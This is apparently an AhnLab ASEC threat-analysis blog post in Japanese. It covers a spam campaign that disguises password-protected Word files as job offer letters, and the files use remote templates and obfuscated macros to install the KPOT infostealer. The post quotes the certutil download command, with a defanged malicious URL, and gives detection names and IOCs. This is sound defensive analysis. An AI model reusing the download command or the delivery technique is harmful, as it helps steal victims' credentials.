ASEC
  • マルウェアの情報
  • AhnLab 検知
  • 総計
  • 対応ガイド
  • AhnLab
Posted By ATCP , 2021년 08월 06일

Job Offer Letter に偽装したマルウェア

ASEC 分析チームは最近、スパムメールに添付された Word ファイルによってインフォスティーラー型のマルウェア、KPOT を配布している状況を確認した。マクロを有効化すると最終的にインフォスティーラー型マルウェアをダウンロードする事例はこれまでにも多く存在したが、今回はユーザーを欺くために Job Offer Letter に偽装したスパムメールに、特定のパスワードがかけられた Word ファイルを利用している点がポイントだと言える。

図1) マルウェアの動作プロセス

スパムメールの正確な流入経路は把握されていないが、Job Offer Letter の内容を盛り込んでいる点と、受信者を区分して付与したかのようなパスワードをメール本文に記載していることから、ユーザーを騙すためにより巧妙な方法を用いたものと推定される。

  • 送信者 : Team Lead
  • メール件名 : Our Team Job Invitation
  • メール本文 : Hello, our invitation is attached to this message. Your personal password: TBBEx○○○○○○○○○○UP3Vm

メール本文に記載されたパスワードを入力すると、圧縮ファイルが解凍される。OOXML(Office Open XML)フォーマットの正常な XML Relationship を利用して、Target アドレスのみに不正な URL を利用するため、ファイルのバイナリだけでは不正かどうかを判断することが難しい。以下の図3)のように settings.xml.rels ファイル内に不正なマクロとペイロードが含まれたリモートテンプレートをロードできる URL が存在するが、ユーザーが Word ファイルを開くだけでも外部の不正な URL に接続を試みる特徴を持っている。

図2) 暗号化圧縮された不正な Word ファイル。パスワードはメール本文に存在する。
図3) ドキュメントに挿入された不正な URL
図4) Word ファイルを開くと自動で不正な URL に接続を試みる

DOTM ファイルには難読化されている不正なマクロコードが含まれている。マクロが実行されると、Windows の正常なプロセスである certutil.exe により KPOT マルウェアがダウンロードされ、以降 dll 形式のマルウェアを rundll32.exe で実行する。

certutil.exe は Windows で証明書を管理するときに使用する基本的なプログラムであるが、「certutil.exe -urlcache -split -f [URL] [output.file]」のような方式でリモート URL から証明書あるいは他のファイルをダウンロードしてローカルファイルとして保存できるため、このような方式でマルウェアの配布に使われることもある。

難読化されているマクロコードをデバッグした場合、以下のように外部 URL から dll ファイルを %TEMP% パスにダウンロードすることがわかる。ここでダウンロードされるファイルが、インフォスティーラー型マルウェアの KPOT である。

certutil.exe -urlcache -split -f hxxps://donattelli[.]com/test/ssi/1.dll C:\Users\[User]\AppData\Local\Temp\rad6FECC.tmp.dll
図5) マクロコードをデバッグすると確認できる DOCM ダウンロード URL および実行方法
図6) 子プロセスとして確認される certutil.exe & rundll32.exe

KPOT マルウェアはインターネットブラウザ、FTP クライアント、VPN クライアント、メッセンジャー、暗号通貨ウォレットからデータを盗むマルウェアである。当社の解析インフラ RAPIT によって WS_FTP / FileZilla / WinSCP の設定ファイルと Outlook アプリケーションのアカウント情報に対するアクセスの試みが確認されている。

以下の図8)からわかるように、コード上でもユーザーの PC 情報だけでなく、様々なアプリケーションの情報を奪取することが確認できる。

図7) 当社インフラ RAPIT で確認できる KPOT インフォスティーラーの不正な行為
図8) KPOT Infostealer の内部コードの一部抜粋

スパムメールを通じて流入するマルウェアの割合が非常に高いため、ユーザーは出どころが不明なメールの添付ファイルを実行しないようにしなければならない。もちろん、信頼できる相手からメールを受信しても送信者のメールアドレスをもう一度確認すべきであり、同時に、基本的にはメール内の添付ファイルを開かないように注意を払う習慣が必要である。

また、使用しているアンチウイルスソフトのエンジンパターンのバージョンを常に最新版にアップデートして使用することを推奨する。

AhnLab V3 プロダクトラインでは、本文で紹介した不正なファイルに対して以下のように検知している。

[ファイル検知]
Downloader/DOC.Generic
Downloader/DOC.Agent
Infostealer/Win.KPot.C4565958

[IOC]
dc3f839b6f2a8c1833d9ae4e4f8dc4c6
23a471d956410bc80dc0cabc006252f6
1ea7d46d94299fa8bad4043c13100df0
hxxps://donattelli[.]com

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories: マルウェアの情報

Tagged as: スパムメール, Macro, MACRO MALICIOUS CODE, Macro Malware, malware, VBA Macro, word macro

変形を続けて拡散している 情報奪取型マルウェアの CryptBot
「BIO 様式」という名前の Word ドキュメントが拡散中

Archives

  • Facebook
  • RSS Feed
follow us in feedly
 

Loading Comments...